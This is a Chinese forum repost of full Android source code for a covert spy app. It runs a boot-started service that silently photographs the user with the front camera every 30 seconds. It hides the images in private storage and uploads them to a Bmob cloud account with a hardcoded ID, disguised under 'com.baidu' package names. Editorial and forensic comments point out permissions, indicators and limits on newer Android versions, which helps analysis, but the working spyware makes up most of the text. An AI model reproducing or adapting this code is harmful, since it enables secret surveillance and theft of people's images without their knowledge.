转载:漏洞利用代码(可悄悄地拍下并上传照片)
刚才看了西贝(cnBeta)上的一篇文章:http://www.cnbeta.com/articles/295257.htm ,里面竟然说后台拍摄照片是ANDROID平台的漏洞,大家看一下这算是漏洞吗?
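这个DEMO会在后台自动拍摄照片,拍摄过程中无预览、无声音、无闪光灯等任何提示,并上传到指定服务器上。由于软件可能被恶意利用,我就上传一个APK和核心代码吧。
(编者注:下面的代码并没有绕过权限模型,应用仍然必须声明并获得 android.permission.CAMERA 和 android.permission.INTERNET 权限,开机自启还需要 RECEIVE_BOOT_COMPLETED;Android 9 起系统不再允许后台应用访问摄像头,Android 12 起摄像头被使用时系统会显示指示标记。排查时应重点审查同时申请这几项权限的应用。)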
PhotoHandler.java
package com.baidu.handle;
import java.io.File;
import java.io.FileOutputStream;
import java.text.SimpleDateFormat;
import java.util.Date;
import android.content.Context;
import android.hardware.Camera;
import android.hardware.Camera.PictureCallback;
import android.os.Environment;
public class PhotoHandler implements PictureCallback {
// Context supplied by the caller; in this class it is only read by getDir().
private final Context context;
/**
 * Keeps the given context so the storage directory can be resolved later.
 *
 * @param context context used by {@link #getDir()}
 */
public PhotoHandler(Context context) {
this.context = context;
}
/**
 * Camera callback: writes the received image bytes to a new file in the directory
 * returned by {@link #getDir()} and then stops the preview and releases the camera.
 *
 * <p>Forensic notes for analysts: files are named {@code Photo_<14 digits>.jpg}; nothing
 * is shown to the user and no media-store entry is created by this method. Progress
 * strings are written through {@code print}.
 *
 * @param data   image bytes delivered by the camera (this handler is passed as the
 *               third argument of {@code takePicture} in CameraService)
 * @param camera the camera that produced the picture
 */
public void onPictureTaken(byte[] data, Camera camera) {
print("照片拍摄回调");
File pictureFileDir = getDir();
// Give up if the target directory is missing and cannot be created.
if (!pictureFileDir.exists() && !pictureFileDir.mkdirs()) {
print("目录不正确");
return;
}
// Backlog cap: once the directory holds more than 10 entries, the picture is dropped.
String[] fileList=pictureFileDir.list();
if(fileList.length>10){
print("超过了10个文件,不再拍摄");
return;
}
// In SimpleDateFormat, lowercase "mm" is minutes and "hh" is the 12-hour clock, so the
// digits after the year are minute, day, hour, minute, second - the name carries no month.
SimpleDateFormat dateFormat = new SimpleDateFormat("yyyymmddhhmmss");
String date = dateFormat.format(new Date());
String photoFile = "Photo_" + date + ".jpg";
String filename = pictureFileDir.getPath() + File.separator + photoFile;
File pictureFile = new File(filename);
try {
// The bytes are written unmodified.
FileOutputStream fos = new FileOutputStream(pictureFile);
fos.write(data);
fos.close();
camera.stopPreview();
camera.release();
} catch (Exception error) {
// Any failure is only printed; nothing is reported to the caller.
error.printStackTrace();
}
}
/**
 * Returns the directory where captured pictures are stored: the application's
 * internal files directory ({@code Context.getFilesDir()}).
 *
 * <p>Internal storage is private to the app, so these files do not show up in the
 * gallery or on shared storage; an examiner has to look inside the app's own data
 * directory. The commented-out line below is an earlier variant that pointed at a
 * {@code Pictures} folder on external storage.
 *
 * @return the app-private files directory
 */
public File getDir() {
return new File(context.getApplicationContext().getFilesDir().getAbsolutePath());
// return new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
}
/**
 * Writes a status message to standard output. On Android, System.out is routed to
 * logcat, so the message strings in this class are visible in device logs.
 *
 * @param s message to write
 */
private void print(String s){
System.out.println(s);
}
}
CameraService.java
package com.baidu.service;
import java.io.File;
import java.io.IOException;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.hardware.Camera;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.BatteryManager;
import android.os.Binder;
import android.os.IBinder;
import android.os.PowerManager;
import android.text.format.Time;
import android.view.SurfaceView;
import cn.bmob.Bmob;
import cn.bmob.BmobFile;
import cn.bmob.BmobObject;
import com.baidu.handle.PhotoHandler;
public class CameraService extends Service implements Runnable {
// Alarm manager used by init() to schedule the repeating "com.baidu.alarm" broadcast.
private AlarmManager am = null;
// Camera opened by the alarm receiver for the current capture.
private Camera camera;
// Last charging state seen by mbatteryReceiver; only printed in run() (the check there is commented out).
public static boolean isCharging=false;
// Binder returned from onBind().
private final IBinder mBinder = new LocalBinder();
// Set after a capture made while the screen was off; cleared when the screen is seen on.
// While it is true and the screen is still off, the alarm receiver skips the capture.
private boolean offQty=false;
//private NotificationManager mNM;
/**
 * Class for clients to access. Because we know this service always runs in
 * the same process as its clients, we don't need to deal with IPC.
 *
 * <p>The binder simply hands out the enclosing {@code CameraService} instance.
 */
public class LocalBinder extends Binder {
/** @return the enclosing service instance */
public CameraService getService() {
return CameraService.this;
}
}
/**
 * Upload pass, started on a fresh thread by the alarm receiver on every alarm.
 *
 * <p>Does nothing unless {@link #isWiFiActive(Context)} reports an active Wi-Fi link.
 * It then walks every entry in the app's internal files directory (not only
 * {@code Photo_*.jpg}), hands each one to the Bmob SDK and deletes the local copy.
 *
 * <p>Forensic notes for analysts: because each file is deleted right after the save
 * calls are issued, an empty files directory does not show that nothing was captured;
 * network logs on Wi-Fi and the logcat strings printed here are the more durable
 * traces. The exact wire behaviour of {@code BmobFile}/{@code BmobObject} is not
 * visible in this listing.
 */
public void run() {
print("WIFI:"+isWiFiActive(CameraService.this));
print("充电:"+isCharging);
// Wi-Fi only: no upload over other connections.
if(!isWiFiActive(CameraService.this))return;
// if(!isCharging)return;
File pictureFileDir =new File(this.getApplicationContext().getFilesDir().getAbsolutePath());
// File pictureFileDir =new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
String[] fileList=pictureFileDir.list();
if(fileList==null){
print("没有文件");
return;
}else{
print("文件数:"+fileList.length);
}
for(String s:fileList){
String filename = pictureFileDir.getPath() + File.separator + s;
print(filename);
BmobFile bmobFile;
try{
// One "Application" record per file, with a fixed name field and the file attached.
BmobObject bObject = new BmobObject("Application");
bmobFile = new BmobFile("Pictures", new File(filename));
bmobFile.save();
bObject.put("applicatName","Barbie");
bObject.put("applicatFile",bmobFile);
bObject.saveInBackground();
// The local copy is removed without waiting for the background save to report back.
File pictureFile = new File(filename);
pictureFile.delete();
System.out.println("图片上传完毕");
// NOTE(review): "Exceptione" below is how the listing reads on this page (the space
// between type and variable appears to have been lost in extraction).
}catch(Exceptione){
print("文件出错了");
e.printStackTrace();
}
}
}
/** Service creation hook; all set-up is delegated to {@code init()}. */
@Override
public void onCreate() {
init();
}
/**
 * One-time set-up: initialises the Bmob SDK, registers the alarm and battery
 * receivers, and schedules a repeating wake-up alarm that drives the captures.
 *
 * <p>Indicators an analyst can take from this method: the custom broadcast action
 * {@code com.baidu.alarm}, a repeating {@code RTC_WAKEUP} alarm with a 30-second
 * period (wakes the device, so it shows up in battery and alarm statistics), and a
 * backend application ID embedded as a string literal, which static analysis of the
 * APK recovers directly. Neither receiver is unregistered anywhere in this listing.
 */
private void init() {
print("init succeed!");
// Register an account at www.codenow.cn and put its Application ID here.
Bmob.initialize(CameraService.this, "da7965baf295e43970912f56c2f1cd1a");
am = (AlarmManager) getSystemService(ALARM_SERVICE);
// Register the broadcast receivers.
IntentFilter filter = new IntentFilter();
filter.addAction("com.baidu.alarm");
registerReceiver(alarmReceiver, filter);
registerReceiver(mbatteryReceiver, new IntentFilter(Intent.ACTION_BATTERY_CHANGED));
Intent intent = new Intent();
intent.setAction("com.baidu.alarm");
PendingIntent pi = PendingIntent.getBroadcast(this, 0, intent, 0);
am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis(),
1000 * 30, pi);// Starts immediately. The original note said "every 5 minutes", but 1000 * 30 ms is 30 seconds.
}
/**
 * Returns {@code START_STICKY}, asking the system to recreate the service after it
 * has been killed. The start intent is ignored.
 */
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
return START_STICKY;
}
/** @return the local binder that exposes this service instance to in-process clients */
@Override
public IBinder onBind(Intent intent) {
return mBinder;
}
/**
 * Receiver for the repeating {@code com.baidu.alarm} broadcast. Each alarm first starts
 * an upload thread ({@code run()}), then decides whether to take a picture.
 *
 * <p>A capture is skipped when the hour is before 5, or when the screen is off and a
 * picture has already been taken since it went off ({@code offQty}). Otherwise the
 * camera returned by {@code openFacingBackCamera()} is opened, given a SurfaceView
 * that is never attached to any window as its preview target, and asked for one
 * picture, which is delivered to {@code PhotoHandler}.
 *
 * <p>Review signal for static analysis: camera use from a Service with a preview
 * surface that is never added to a view hierarchy, and {@code takePicture} called
 * with no shutter or raw callbacks.
 */
BroadcastReceiver alarmReceiver = new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
if ("com.baidu.alarm".equals(intent.getAction())) {
// Upload whatever is already stored, on its own thread.
new Thread(CameraService.this).start();
Time t=new Time();
t.setToNow();
print("我在执行时间判断");
// No captures between 00:00 and 04:59. Time.hour is documented as 0-23, so the
// "> 24" arm is not expected to match.
if((t.hour<5) || t.hour>24){
print("时间不正确,不拍摄!");
return;
}
PowerManager pm = (PowerManager) context.getSystemService(Context.POWER_SERVICE);
if(pm.isScreenOn()) {
offQty=false;
print("屏幕是亮的");
}else{
print("屏幕是暗的");
// Already captured once while the screen has been off.
if(offQty==true) return;
}
camera = openFacingBackCamera();
if (camera != null) {
// Preview target that is never displayed.
SurfaceView dummy = new SurfaceView(getBaseContext());
try {
camera.setPreviewDisplay(dummy.getHolder());
} catch (IOException e) {
print("拍摄出问题");
//e.printStackTrace();
}
camera.startPreview();
camera.autoFocus(null);
// Only the third callback is supplied; PhotoHandler stores the result and releases the camera.
camera.takePicture(null, null, new PhotoHandler(
getApplicationContext()));
if(!pm.isScreenOn()) offQty=true;
print("图片拍摄完毕");
}else{
print("木有照相机T_T");
}
}
}
};
/**
 * Checks whether Wi-Fi is connected.
 *
 * <p>Reading the connection info requires the {@code ACCESS_WIFI_STATE} permission,
 * which is one more entry to look for in the app's manifest.
 *
 * @param inContext context used to obtain the Wi-Fi system service
 * @return {@code true} when Wi-Fi is enabled and the current connection reports a
 *         non-zero IP address, {@code false} otherwise
 */
public static boolean isWiFiActive(Context inContext) {
WifiManager mWifiManager = (WifiManager) inContext
.getSystemService(Context.WIFI_SERVICE);
WifiInfo wifiInfo = mWifiManager.getConnectionInfo();
// A missing WifiInfo is treated like "no address".
int ipAddress = wifiInfo == null ? 0 : wifiInfo.getIpAddress();
if (mWifiManager.isWifiEnabled() && ipAddress != 0) {
return true;
} else {
return false;
}
}
/**
 * Opens a camera and returns it.
 *
 * <p>Despite the method name and the original comment ("rear camera"), the loop
 * selects cameras whose facing is {@code CAMERA_FACING_FRONT}, i.e. the user-facing
 * camera. The loop does not stop at the first match, and a failure to open is
 * silently ignored.
 *
 * @return the camera opened for the last front-facing index, or {@code null} when
 *         no front-facing camera exists or it could not be opened
 */
private Camera openFacingBackCamera() {
Camera cam = null;
Camera.CameraInfo cameraInfo = new Camera.CameraInfo();
for (int camIdx = 0, cameraCount = Camera.getNumberOfCameras(); camIdx < cameraCount; camIdx++) {
Camera.getCameraInfo(camIdx, cameraInfo);
if (cameraInfo.facing == Camera.CameraInfo.CAMERA_FACING_FRONT) {
try {
cam = Camera.open(camIdx);
} catch (Exception e) {
// Open failures are swallowed; cam keeps its previous value.
}
}
}
return cam;
}
/**
 * Tracks whether the phone is charging.
 *
 * <p>Updates the static {@code isCharging} flag from the {@code "status"} extra of the
 * battery broadcast. In this listing the flag is only printed by {@code run()}.
 */
private BroadcastReceiver mbatteryReceiver=new BroadcastReceiver()
{
@Override
public void onReceive(Context context, Intent intent)
{
String action =intent.getAction();
// The "if" below ends with ';', so the braces that follow run for every broadcast.
// The receiver is registered only for ACTION_BATTERY_CHANGED in init().
if(Intent.ACTION_BATTERY_CHANGED.equals(action));
{
int status=intent.getIntExtra("status",BatteryManager.BATTERY_STATUS_UNKNOWN);
if(status==BatteryManager.BATTERY_STATUS_CHARGING)
{
isCharging=true;
}
else
{
isCharging=false;
}
}
}
};
/**
 * Writes a status message to standard output. On Android, System.out is routed to
 * logcat, so the service's progress strings are visible in device logs.
 *
 * @param s message to write
 */
private void print(String s){
System.out.println(s);
}
}
MainActivity.java
package com.hacker;
import com.baidu.service.CameraService;
import android.app.Activity;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.ServiceConnection;
import android.os.Bundle;
import android.os.IBinder;
import android.widget.ImageView;
//程序的主界面,主要用来根据部门显示姓名
public class MainActivity extends Activity {
// Intent used both to start and to bind CameraService.
private Intent serviceIntent;
/**
 * Creates and shows the main screen, then starts {@code CameraService} and binds to it.
 *
 * <p>The visible UI is a single layout with an image view that is looked up but not
 * used further here; the work relevant to a reviewer is the service start. Because
 * the service is started as well as bound, it is not tied to this activity's
 * lifetime.
 */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
final ImageView image1 = (ImageView)findViewById(R.id.image1);
serviceIntent = new Intent(MainActivity.this, CameraService.class);
startService(serviceIntent);
bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE);
}
/**
 * Unbinds from the service when the activity is destroyed. The service is not
 * stopped here, so a service started with {@code startService} keeps running after
 * the UI is gone.
 */
@Override
protected void onDestroy(){
super.onDestroy();
unbindService(serviceConnection);
}
/**
 * Connection callbacks for the bound {@code CameraService}. The service reference is
 * fetched on connect but not stored or used, and disconnects are ignored.
 */
ServiceConnection serviceConnection = new ServiceConnection() {
public void onServiceConnected(ComponentName name, IBinder service) {
// Result is discarded.
((CameraService.LocalBinder) service).getService();
}
public void onServiceDisconnected(ComponentName name) {
}
};
}
BootCompleteReceiver.java
package com.hacker;
import com.baidu.service.CameraService;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class BootCompleteReceiver extends BroadcastReceiver {
/**
 * Starts {@code CameraService} whenever this receiver is triggered, without checking
 * the intent's action, and logs under the tag {@code PhoneService}.
 *
 * <p>The manifest is not part of this listing; presumably the receiver is declared
 * there for the boot-completed broadcast, which also requires the
 * {@code RECEIVE_BOOT_COMPLETED} permission - confirm against the APK. On current
 * Android releases, background-service start limits (Android 8.0 and later, for apps
 * targeting API 26+) generally block this start-at-boot pattern.
 */
@Override
public void onReceive(Context context, Intent intent) {
// Original note: this class receives the boot notification after the phone starts and
// then starts the "phone listening" service (the wording looks carried over from other code).
Intent service = new Intent(context, CameraService.class);
context.startService(service);
Log.d("PhoneService","服务已经成功启动");
}
}
每种操作系统的漏洞都不少。
楼主这耗电量怎么样?是不是很大的?